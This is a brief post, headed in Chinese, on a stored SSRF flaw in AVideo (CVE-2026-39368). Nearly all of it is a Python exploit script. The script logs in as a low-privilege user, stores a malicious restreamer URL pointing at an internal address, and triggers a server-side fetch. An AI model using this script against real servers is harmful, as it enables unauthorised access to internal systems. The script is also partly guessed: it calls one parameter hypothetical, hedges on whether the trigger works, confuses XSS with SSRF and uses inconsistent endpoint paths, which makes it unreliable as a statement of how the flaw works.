CVE-2026-39368 AVideo 存储型SSRF漏洞

import requests # Configuration target_host = "http://avideo-example.com" attacker_controlled_url = "http://127.0.0.1:8080/internal-config" login_url = f"{target_host}/object/login.json" vuln_url = f"{target_host}/objects/restreamerLog.json.php" # 1. Authenticate as a low-privilege user with streaming permission session = requests.Session() credentials = {"user": "lowpriv_user", "pass": "password"} session.post(login_url, data=credentials) # 2. Exploit: Submit the malicious restreamerURL (Stored XSS/SSRF) payload = { "restreamerURL": attacker_controlled_url, "action": "save" # Hypothetical parameter based on common flows } response = session.post(vuln_url, data=payload) if response.status_code == 200: print("[+] Payload stored successfully.") # 3. Trigger: The server will fetch the URL later, or force a check # Depending on the app logic, viewing the log might trigger the fetch trigger_url = f"{target_host}/objects/restreamerLog.json.php?forceCheck=1" session.get(trigger_url) print("[*] Check server logs or netcat listener on internal port for connection.")